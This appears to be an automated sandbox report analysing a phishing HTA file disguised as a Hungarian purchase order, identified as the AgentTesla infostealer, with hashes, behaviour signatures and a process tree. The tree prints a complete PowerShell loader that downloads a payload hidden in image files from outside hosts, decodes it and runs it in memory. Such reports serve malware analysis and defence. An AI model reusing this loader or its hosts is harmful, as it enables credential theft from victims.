Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-02-2024 17:57

General

  • Target

    Rendelés_(PO5042208)_Az Idumont.hta

  • Size

    9KB

  • MD5

    0766fff13fcd69232a01442507c7faaf

  • SHA1

    e559fef859f0da7dbb27ee0ee81b68f759b8772a

  • SHA256

    5f86822a5a049aaa09d6f11ad557f4c2ae8ce57b37daa6b00658fff4ee1ce090

  • SHA512

    ae8bc05b1233b8495f18a3f11ebbd2a5e2ad8345b3eed593ef4885a76eff74fa5f9a11f150b087dfea1fba9a29d0ae8ac8107d7da5de7e5abdf848a1c8b68988

  • SSDEEP

    192:sv0r6VP2SMNXVBVLkC6YWILLDFDNk6cl26nWc8t9embQV:sv0rwQvDwhMDxNkmV9embm

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Rendelés_(PO5042208)_Az Idumont.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/999/original/new_image.jpg?1707144651', 'http://45.74.19.84/xampp/bkp/bkp_hta.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('w5x8fgEv-w5YOBA!=yekhtua&99212%420139D0B4D360A9=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'C:\ProgramData\' , 'Name'))}}
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2968
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 2184
          4⤵
          • Program crash
          PID:4616
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2968 -ip 2968
    1⤵
      PID:1584

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzufl3zs.tab.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2968-35-0x00000000703D0000-0x0000000070B80000-memory.dmp

      Filesize

      7.7MB

    • memory/2968-34-0x00000000030A0000-0x00000000030B0000-memory.dmp

      Filesize

      64KB

    • memory/2968-32-0x0000000005C20000-0x00000000061C4000-memory.dmp

      Filesize

      5.6MB

    • memory/2968-33-0x00000000703D0000-0x0000000070B80000-memory.dmp

      Filesize

      7.7MB

    • memory/2968-28-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/3852-1-0x0000000072A40000-0x0000000072FF1000-memory.dmp

      Filesize

      5.7MB

    • memory/3852-2-0x0000000004110000-0x0000000004120000-memory.dmp

      Filesize

      64KB

    • memory/3852-4-0x0000000072A40000-0x0000000072FF1000-memory.dmp

      Filesize

      5.7MB

    • memory/3852-0-0x0000000072A40000-0x0000000072FF1000-memory.dmp

      Filesize

      5.7MB

    • memory/4268-21-0x0000000006040000-0x0000000006394000-memory.dmp

      Filesize

      3.3MB

    • memory/4268-26-0x00000000083E0000-0x000000000892C000-memory.dmp

      Filesize

      5.3MB

    • memory/4268-10-0x0000000005D20000-0x0000000005D86000-memory.dmp

      Filesize

      408KB

    • memory/4268-22-0x00000000063E0000-0x00000000063FE000-memory.dmp

      Filesize

      120KB

    • memory/4268-23-0x0000000006430000-0x000000000647C000-memory.dmp

      Filesize

      304KB

    • memory/4268-24-0x0000000007D60000-0x00000000083DA000-memory.dmp

      Filesize

      6.5MB

    • memory/4268-25-0x0000000006940000-0x000000000695A000-memory.dmp

      Filesize

      104KB

    • memory/4268-20-0x0000000005FD0000-0x0000000006036000-memory.dmp

      Filesize

      408KB

    • memory/4268-27-0x0000000007A80000-0x0000000007B1C000-memory.dmp

      Filesize

      624KB

    • memory/4268-9-0x0000000005430000-0x0000000005452000-memory.dmp

      Filesize

      136KB

    • memory/4268-8-0x00000000055F0000-0x0000000005C18000-memory.dmp

      Filesize

      6.2MB

    • memory/4268-7-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

      Filesize

      64KB

    • memory/4268-31-0x00000000703D0000-0x0000000070B80000-memory.dmp

      Filesize

      7.7MB

    • memory/4268-6-0x0000000004E60000-0x0000000004E96000-memory.dmp

      Filesize

      216KB

    • memory/4268-5-0x00000000703D0000-0x0000000070B80000-memory.dmp

      Filesize

      7.7MB